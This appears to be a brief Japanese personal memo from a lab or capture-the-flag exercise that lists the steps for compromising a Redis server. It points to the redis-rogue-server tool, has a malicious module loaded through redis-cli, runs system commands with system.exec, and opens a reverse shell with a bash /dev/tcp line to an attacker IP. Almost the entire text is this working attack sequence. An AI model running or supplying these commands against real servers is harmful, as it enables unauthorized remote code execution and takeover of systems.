Open1

脆弱性

iestudyiestudy

Redis

モジュールをダウンロード
https://github.com/n0b0dyCN/redis-rogue-server

コマンド
#include <string.h>
#include <arpa/inet.h>
を追加

redis-cli -h 192.168.117.93
MODULE LOAD /var/ftp/pub/module.so
system.exec "id"
system.exec "bash -i >& /dev/tcp/192.168.45.240/6379 0>&1"